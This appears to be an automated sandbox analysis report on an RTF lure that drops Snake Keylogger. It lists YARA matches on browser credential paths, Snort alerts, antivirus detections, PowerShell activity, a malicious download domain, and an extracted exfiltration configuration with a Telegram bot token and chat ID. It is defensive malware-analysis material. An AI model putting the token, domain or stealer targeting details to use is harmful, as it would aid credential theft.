8.2.mum.exe.3878b50.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19336:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1851f:$a3: \Google\Chrome\User Data\Default\Login Data 0x18966:$a4: \Orbitum\User Data\Default\Login Data 0x19ae7:$a5: \Kometa\User Data\Default\Login Data
8.2.mum.exe.3878b50.10.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.mum.exe.3878b50.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.mum.exe.3878b50.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.mum.exe.3878b50.10.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x129f9:$s1: UnHook 0x12a00:$s2: SetHook 0x12a08:$s3: CallNextHook 0x12a15:$s4: _hook
8.2.mum.exe.3878b50.10.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16a24:$x1: $%SMTPDV$ 0x156ea:$x2: $#TheHashHere%& 0x169cc:$x3: %FTPDV$ 0x156cc:$x4: $%TelegramDv$ 0x1306e:$x5: KeyLoggerEventArgs 0x13404:$x5: KeyLoggerEventArgs 0x16a50:$m1: \| Snake Keylogger 0x16af6:$m1: \| Snake Keylogger 0x16c4a:$m1: \| Snake Keylogger 0x16d70:$m1: \| Snake Keylogger 0x16eca:$m1: \| Snake Keylogger 0x169f0:$m2: Clipboard Logs ID 0x16c00:$m2: Screenshot Logs ID 0x16d14:$m2: keystroke Logs ID 0x16f00:$m3: SnakePW 0x16bd8:$m4: \SnakeKeylogger\
8.2.mum.exe.3878b50.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11e53:$a1: get_encryptedPassword 0x1213f:$a2: get_encryptedUsername 0x11c5f:$a3: get_timePasswordChanged 0x11d5a:$a4: get_passwordField 0x11e69:$a5: set_encryptedPassword 0x134a1:$a7: get_logins 0x13404:$a10: KeyLoggerEventArgs 0x1306e:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.3878b50.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b136:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a31f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a766:$a4: \Orbitum\User Data\Default\Login Data 0x1b8e7:$a5: \Kometa\User Data\Default\Login Data
8.2.mum.exe.3878b50.10.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.mum.exe.3878b50.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.mum.exe.3878b50.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.mum.exe.3878b50.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.mum.exe.3878b50.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x147f9:$s1: UnHook 0x14800:$s2: SetHook 0x14808:$s3: CallNextHook 0x14815:$s4: _hook
8.2.mum.exe.3878b50.10.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18824:$x1: $%SMTPDV$ 0x174ea:$x2: $#TheHashHere%& 0x187cc:$x3: %FTPDV$ 0x174cc:$x4: $%TelegramDv$ 0x14e6e:$x5: KeyLoggerEventArgs 0x15204:$x5: KeyLoggerEventArgs 0x18850:$m1: \| Snake Keylogger 0x188f6:$m1: \| Snake Keylogger 0x18a4a:$m1: \| Snake Keylogger 0x18b70:$m1: \| Snake Keylogger 0x18cca:$m1: \| Snake Keylogger 0x187f0:$m2: Clipboard Logs ID 0x18a00:$m2: Screenshot Logs ID 0x18b14:$m2: keystroke Logs ID 0x18d00:$m3: SnakePW 0x189d8:$m4: \SnakeKeylogger\
8.2.mum.exe.3878b50.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c53:$a1: get_encryptedPassword 0x13f3f:$a2: get_encryptedUsername 0x13a5f:$a3: get_timePasswordChanged 0x13b5a:$a4: get_passwordField 0x13c69:$a5: set_encryptedPassword 0x152a1:$a7: get_logins 0x15204:$a10: KeyLoggerEventArgs 0x14e6e:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.3859130.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b136:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ab56:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a31f:$a3: \Google\Chrome\User Data\Default\Login Data 0x39d3f:$a3: \Google\Chrome\User Data\Default\Login Data 0x1a766:$a4: \Orbitum\User Data\Default\Login Data 0x3a186:$a4: \Orbitum\User Data\Default\Login Data 0x1b8e7:$a5: \Kometa\User Data\Default\Login Data 0x3b307:$a5: \Kometa\User Data\Default\Login Data
8.2.mum.exe.3859130.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.mum.exe.3859130.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.mum.exe.3859130.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.mum.exe.3859130.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.mum.exe.3859130.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x147f9:$s1: UnHook 0x34219:$s1: UnHook 0x14800:$s2: SetHook 0x34220:$s2: SetHook 0x14808:$s3: CallNextHook 0x34228:$s3: CallNextHook 0x14815:$s4: _hook 0x34235:$s4: _hook
8.2.mum.exe.3859130.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18824:$x1: $%SMTPDV$ 0x38244:$x1: $%SMTPDV$ 0x174ea:$x2: $#TheHashHere%& 0x36f0a:$x2: $#TheHashHere%& 0x187cc:$x3: %FTPDV$ 0x381ec:$x3: %FTPDV$ 0x174cc:$x4: $%TelegramDv$ 0x36eec:$x4: $%TelegramDv$ 0x14e6e:$x5: KeyLoggerEventArgs 0x15204:$x5: KeyLoggerEventArgs 0x3488e:$x5: KeyLoggerEventArgs 0x34c24:$x5: KeyLoggerEventArgs 0x18850:$m1: \| Snake Keylogger 0x188f6:$m1: \| Snake Keylogger 0x18a4a:$m1: \| Snake Keylogger 0x18b70:$m1: \| Snake Keylogger 0x18cca:$m1: \| Snake Keylogger 0x38270:$m1: \| Snake Keylogger 0x38316:$m1: \| Snake Keylogger 0x3846a:$m1: \| Snake Keylogger 0x38590:$m1: \| Snake Keylogger
8.2.mum.exe.3859130.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c53:$a1: get_encryptedPassword 0x33673:$a1: get_encryptedPassword 0x13f3f:$a2: get_encryptedUsername 0x3395f:$a2: get_encryptedUsername 0x13a5f:$a3: get_timePasswordChanged 0x3347f:$a3: get_timePasswordChanged 0x13b5a:$a4: get_passwordField 0x3357a:$a4: get_passwordField 0x13c69:$a5: set_encryptedPassword 0x33689:$a5: set_encryptedPassword 0x152a1:$a7: get_logins 0x34cc1:$a7: get_logins 0x15204:$a10: KeyLoggerEventArgs 0x34c24:$a10: KeyLoggerEventArgs 0x14e6e:$a11: KeyLoggerEventArgsEventHandler 0x3488e:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.3837910.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.mum.exe.3837910.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.mum.exe.3837910.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.mum.exe.3837910.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.mum.exe.3837910.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x36019:$s1: UnHook 0x55a39:$s1: UnHook 0x36020:$s2: SetHook 0x55a40:$s2: SetHook 0x36028:$s3: CallNextHook 0x55a48:$s3: CallNextHook 0x36035:$s4: _hook 0x55a55:$s4: _hook
8.2.mum.exe.3837910.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3a044:$x1: $%SMTPDV$ 0x59a64:$x1: $%SMTPDV$ 0x38d0a:$x2: $#TheHashHere%& 0x5872a:$x2: $#TheHashHere%& 0x39fec:$x3: %FTPDV$ 0x59a0c:$x3: %FTPDV$ 0x38cec:$x4: $%TelegramDv$ 0x5870c:$x4: $%TelegramDv$ 0x3668e:$x5: KeyLoggerEventArgs 0x36a24:$x5: KeyLoggerEventArgs 0x560ae:$x5: KeyLoggerEventArgs 0x56444:$x5: KeyLoggerEventArgs 0x3a070:$m1: \| Snake Keylogger 0x3a116:$m1: \| Snake Keylogger 0x3a26a:$m1: \| Snake Keylogger 0x3a390:$m1: \| Snake Keylogger 0x3a4ea:$m1: \| Snake Keylogger 0x59a90:$m1: \| Snake Keylogger 0x59b36:$m1: \| Snake Keylogger 0x59c8a:$m1: \| Snake Keylogger 0x59db0:$m1: \| Snake Keylogger
8.2.mum.exe.3837910.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35473:$a1: get_encryptedPassword 0x54e93:$a1: get_encryptedPassword 0x3575f:$a2: get_encryptedUsername 0x5517f:$a2: get_encryptedUsername 0x3527f:$a3: get_timePasswordChanged 0x54c9f:$a3: get_timePasswordChanged 0x3537a:$a4: get_passwordField 0x54d9a:$a4: get_passwordField 0x35489:$a5: set_encryptedPassword 0x54ea9:$a5: set_encryptedPassword 0x36ac1:$a7: get_logins 0x564e1:$a7: get_logins 0x36a24:$a10: KeyLoggerEventArgs 0x56444:$a10: KeyLoggerEventArgs 0x3668e:$a11: KeyLoggerEventArgsEventHandler 0x560ae:$a11: KeyLoggerEventArgsEventHandler
8.2.mum.exe.275ac68.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
8.2.mum.exe.275ac68.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x1e0abe:$v1: SbieDll.dll 0x1e0b12:$v2: USER 0x1e0b1e:$v3: SANDBOX 0x1e0af4:$v4: VIRUS 0x1e0b32:$v4: VIRUS 0x1e0b6e:$v5: MALWARE 0x1e0b5a:$v6: SCHMIDTI 0x1e0b80:$v7: CURRENTUSER
Click to see the 44 entries

Snort Signatures

ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check - Source IP: 192.168.2.22 - Destination IP: 132.226.8.169

Timestamp:	192.168.2.22132.226.8.16949173802842536 08/23/22-13:43:14.345361
SID:	2842536
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check - Source IP: 192.168.2.22 - Destination IP: 193.122.130.0

Timestamp:	192.168.2.22193.122.130.049175802842536 08/23/22-13:43:56.802113
SID:	2842536
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check - Source IP: 192.168.2.22 - Destination IP: 193.122.130.0

Timestamp:	192.168.2.22193.122.130.049174802842536 08/23/22-13:43:29.255487
SID:	2842536
Source Port:	49174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Revised sales contract for Crosswear.rtf

ReversingLabs: Detection: 32%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1250356
Source: C:\Users\user\AppData\Roaming\mum.exe	Avira: detection malicious, Label: HEUR/AGEN.1250356
Source: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Avira: detection malicious, Label: HEUR/AGEN.1250356

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe

ReversingLabs: Detection: 80%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mum.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe	Joe Sandbox ML: detected

Source: 15.0.mum.exe.400000.0.unpack

Avira: Label: TR/ATRAPS.Gen

Source: 8.2.mum.exe.3859130.8.raw.unpack

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "5653882710:AAFqiub7KKNl9WuwdcBa3Hc2Wwy7UHDnsWc", "Telegram ID": "1120598411"}

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :\Windows\mscorlib.pdb3 source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\mscorlib.pdb#\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb?\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :\Windows\dll\mscorlib.pdb/ source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: mum[1].exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT	Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: f0705964.xsph.ru
Source: global traffic	DNS query: name: f0705964.xsph.ru
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CE6F9h	15_2_002CE440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CEB51h	15_2_002CE89C
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CEFA9h	15_2_002CECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CC439h	15_2_002CC17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C3897h	15_2_002C3576
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CF401h	15_2_002CF148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CF859h	15_2_002CF5A4
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CFCB1h	15_2_002CF9FB
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CC891h	15_2_002CC5DC
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C28E1h	15_2_002C2620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C3CF7h	15_2_002C3A38
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CCCE9h	15_2_002CCA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CD141h	15_2_002CCE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C4157h	15_2_002C3E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C2EA2h	15_2_002C2A90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CD599h	15_2_002CD2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C45B7h	15_2_002C42F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CD9F1h	15_2_002CD738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C4A17h	15_2_002C4758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CDE49h	15_2_002CDB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002CE2A1h	15_2_002CDFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_002C217A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002C2EA2h	15_2_002C2DD1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_002C1B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_002C2359
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E6AE1h	15_2_003E6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E80C1h	15_2_003E7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E18A9h	15_2_003E1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E8519h	15_2_003E8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E1D01h	15_2_003E1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E5501h	15_2_003E5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E02F1h	15_2_003E0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E0749h	15_2_003E04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E6F39h	15_2_003E6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E0BA1h	15_2_003E08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E5981h	15_2_003E56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E8971h	15_2_003E86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E5DD9h	15_2_003E5B30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E8DC9h	15_2_003E8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E73BAh	15_2_003E7110
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E9221h	15_2_003E8F78
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E7811h	15_2_003E7568
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E0FF9h	15_2_003E0D50
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E1451h	15_2_003E11A8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E6231h	15_2_003E5F88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E6689h	15_2_003E63E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 003E7C69h	15_2_003E79C0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	15_2_003E3498
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	15_2_003E3489
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	15_2_003E37AE
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CE6F9h	26_2_001CE440
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CEB51h	26_2_001CE89A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CEFA9h	26_2_001CECF0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CF401h	26_2_001CF148
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CC439h	26_2_001CC17F
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C3897h	26_2_001C3576
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CF859h	26_2_001CF5A2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CFCB1h	26_2_001CF9FA
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CC891h	26_2_001CC5E2
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C3CF7h	26_2_001C3A38
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CCCE9h	26_2_001CCA30
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C28E1h	26_2_001C2620
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C4157h	26_2_001C3E98
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C2EA2h	26_2_001C2A90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CD141h	26_2_001CCE88
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C45B7h	26_2_001C42F9
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CD599h	26_2_001CD2E0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CD9F1h	26_2_001CD738
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C4A17h	26_2_001C4758
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CDE49h	26_2_001CDB90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001CE2A1h	26_2_001CDFE8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	26_2_001C217A
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 001C2EA2h	26_2_001C2DD1
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	26_2_001C2359
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	26_2_001C1B48
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E6AE1h	26_2_002E6838
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E18A9h	26_2_002E1600
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E80C1h	26_2_002E7E18
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E8519h	26_2_002E8270
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E02F1h	26_2_002E0048
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E1D01h	26_2_002E1A58
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E5501h	26_2_002E5258
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E0749h	26_2_002E04A0
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E6F39h	26_2_002E6C90
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E0BA1h	26_2_002E08F8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E8971h	26_2_002E86C8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E5981h	26_2_002E56D8
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E8DC9h	26_2_002E8B20
Source: C:\Users\user\AppData\Roaming\mum.exe	Code function: 4x nop then jmp 002E5DD9h	26_2_002E5B30
